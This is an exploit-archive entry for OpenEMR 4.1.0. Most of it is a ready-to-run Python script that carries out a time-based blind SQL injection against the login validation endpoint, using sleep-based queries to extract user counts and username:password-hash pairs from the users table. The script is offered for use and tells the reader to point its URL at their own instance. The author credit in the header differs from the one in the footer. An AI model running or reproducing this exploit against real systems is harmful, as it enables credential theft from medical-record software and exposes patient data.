|===========================================================================
| # Exploit Title : OpenEMR 4.1.0 - SQL Injection
|
| # Author : Ali Seddigh
|
| # Category : Web Application
|
| # Vendor Homepage: https://www.open-emr.org/
|
| # Software Link: http://sourceforge.net/projects/openemr/files/OpenEMR%20Current/4.1.0/openemr-4.1.0.zip/download
|
| # Tested on : [Windows ~> 10]
|
| # Version: 4.1
|
| # Date : 2021-04-22
|===========================================================================
#!/usr/bin/env python3
import requests
import string
import sys
print("""
____ ________ _______ __ __ ___ ____
/ __ \____ ___ ____ / ____/ |/ / __ \ / // / < // __ \\
/ / / / __ \/ _ \/ __ \/ __/ / /|_/ / /_/ / / // /_ / // / / /
/ /_/ / /_/ / __/ / / / /___/ / / / _, _/ /__ __/ / // /_/ /
\____/ .___/\___/_/ /_/_____/_/ /_/_/ |_| /_/ (_)_(_)____/
/_/
____ ___ __ _____ ____ __ _
/ __ )/ (_)___ ____/ / / ___// __ \ / / (_)
/ /_/ / / / __ \/ __ / \__ \/ / / / / / / /
/ /_/ / / / / / / /_/ / ___/ / /_/ / / /___/ /
/_____/_/_/_/ /_/\__,_/ /____/\___\_\/_____/_/
""")
all = string.printable
# edit url to point to your openemr instance
url = "http://192.168.56.106/openemr/interface/login/validateUser.php?u="
def extract_users_num():
print("[+] Finding number of users...")
for n in range(1,100):
payload = '\'%2b(SELECT+if((select count(username) from users)=' + str(n) + ',sleep(3),1))%2b\''
r = requests.get(url+payload)
if r.elapsed.total_seconds() > 3:
user_length = n
break
print("[+] Found number of users: " + str(user_length))
return user_length
def extract_users():
users = extract_users_num()
print("[+] Extracting username and password hash...")
output = []
for n in range(1,1000):
payload = '\'%2b(SELECT+if(length((select+group_concat(username,\':\',password)+from+users+limit+0,1))=' + str(n) + ',sleep(3),1))%2b\''
#print(payload)
r = requests.get(url+payload)
#print(r.request.url)
if r.elapsed.total_seconds() > 3:
length = n
break
for i in range(1,length+1):
for char in all:
payload = '\'%2b(SELECT+if(ascii(substr((select+group_concat(username,\':\',password)+from+users+limit+0,1),'+ str(i)+',1))='+str(ord(char))+',sleep(3),1))%2b\''
#print(payload)
r = requests.get(url+payload)
#print(r.request.url)
if r.elapsed.total_seconds() > 3:
output.append(char)
if char == ",":
print("")
continue
print(char, end='', flush=True)
try:
extract_users()
except KeyboardInterrupt:
print("")
print("[+] Exiting...")
sys.exit()
|===========================================================================
| # Discovered By : Ali Triplex
|===========================================================================
